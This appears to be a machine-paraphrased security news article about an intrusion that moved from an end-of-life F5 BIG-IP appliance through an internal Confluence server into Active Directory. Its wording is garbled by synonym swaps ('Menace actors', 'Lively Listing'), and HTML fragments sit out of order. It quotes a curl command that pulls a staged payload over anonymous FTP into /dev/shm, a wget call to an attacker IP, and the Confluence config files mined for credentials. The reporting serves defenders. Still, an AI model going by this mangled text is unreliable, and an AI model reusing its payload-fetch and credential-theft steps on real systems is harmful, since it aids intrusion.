Menace actors are actively exploiting end-of-life F5 BIG-IP home equipment to achieve unauthorized SSH entry into enterprise networks, utilizing the compromised units as launchpads for classy multi-stage intrusion campaigns that finally goal Lively Listing infrastructure<\/a>.<\/p>\n Microsoft Menace Intelligence disclosed the complete assault chain on Could 22, 2026, documenting how a single compromised edge equipment cascaded into domain-level compromise spanning Linux hosts, an inner Atlassian Confluence server, and Home windows authentication methods.<\/p>\n Within the documented incident, investigators traced the menace actor\u2019s preliminary SSH entry to an Azure-hosted\u00a0F5 BIG-IP Digital Version (VE) working model 15.1.201000,\u00a0a cloud-deployed construct generally provisioned through Azure ARM templates and Terraform modules. <\/p>\n This particular model reached\u00a0end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported on the time of compromise.<\/p>\n The timing aligns immediately with the broader F5 menace panorama. In\u00a0August 2025, a complicated nation-state menace actor breached F5\u2019s inner methods and exfiltrated BIG-IP product supply code together with particulars of undisclosed, unpatched vulnerabilities. <\/p>\n That breach, publicly disclosed by F5 in October 2025, has been linked to the\u00a0BRICKSTORM malware household, which is related to campaigns concentrating on software program and cloud distributors to reap supply code and credentials for downstream provide chain exploitation.<\/p>\n Compounding the chance,\u00a0CVE-2025-53521,\u00a0a important flaw in F5 BIG-IP Entry Coverage Supervisor (APM)<\/a>, was initially disclosed in October 2025 as a denial-of-service bug. Nonetheless, it was reclassified in\u00a0March 2026\u00a0as a\u00a0distant code execution (RCE) vulnerability with a CVSS rating of 9.8. <\/p>\n CISA added CVE-2025-53521 <\/a>to its Identified Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with Shadowserver Basis reporting over\u00a017,000 susceptible IPs worldwide\u00a0on the time. The Dutch Nationwide Cyber Safety Heart additionally independently confirmed lively abuse of this vulnerability within the wild.<\/p>\n As soon as SSH entry was established through the compromised F5 equipment, the menace actor authenticated utilizing a\u00a0privileged account with unrestricted sudo rights\u00a0and maintained hands-on keyboard entry all through your entire intrusion with out deploying specific persistence mechanisms.<\/p>\n The attacker instantly launched aggressive reconnaissance utilizing a layered toolkit:<\/p>\n Makes an attempt to make use of commonplace NTLM-based lateral motion instruments, together with\u00a0 Throughout reconnaissance, the menace actor recognized an internally hosted\u00a0Atlassian Confluence server\u00a0carrying unpatched distant code execution vulnerabilities.<\/p>\n Microsoft acknowledged that<\/a> the server was not internet-facing; it turned reachable solely after the attacker gained inner community entry, a key threat in hybrid and cloud environments the place implicit belief boundaries exist between companies.<\/p>\n When real-time safety (RTP) on the Confluence host blocked direct payload supply, the menace actor tailored by standing up a Python FTP server on the preliminary Linux host to stage and switch the payload utilizing nameless FTP:<\/p>\n After compromising Confluence, the attacker extracted credentials from\u00a0 This included exploitation of\u00a0CVE-2025-33073, a Home windows SMB NTLM reflection<\/a> vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv. <\/p>\n CVE-2025-33073 removes the prerequisite of admin entry to realize authenticated RCE as SYSTEM on any domain-joined machine with out SMB signing enforced, requiring solely community entry and any legitimate area credential.<\/p>\nF5 BIG-IP to Acquire SSH Entry<\/strong><\/h2>\n
![\"Attack](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-105.webp\")
![\"Threat](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-106.webp\")
\n
206.189.27[.]39:8888<\/code>\u00a0through\u00a0wget<\/code>\u00a0to enumerate net utility entry controls<\/li>\n<\/ul>\nenum4linux<\/code>,\u00a0kerbrute<\/code>,\u00a0responder<\/code>,\u00a0smbclient<\/code>, and\u00a0netexec<\/code>\u00a0 in opposition to the Home windows infrastructure have been initially unsuccessful.<\/p>\nbash
curl -o \/dev\/shm\/ag ftp:\/\/nameless:nameless@[REDACTED_LOCAL_IP]\/5<\/code><\/pre>\n\/choose\/atlassian\/confluence\/conf\/server.xml<\/code>\u00a0and\u00a0confluence.cfg.xml<\/code>\u00a0and weaponized them for\u00a0Kerberos relay assaults\u00a0in opposition to the area infrastructure. <\/p>\n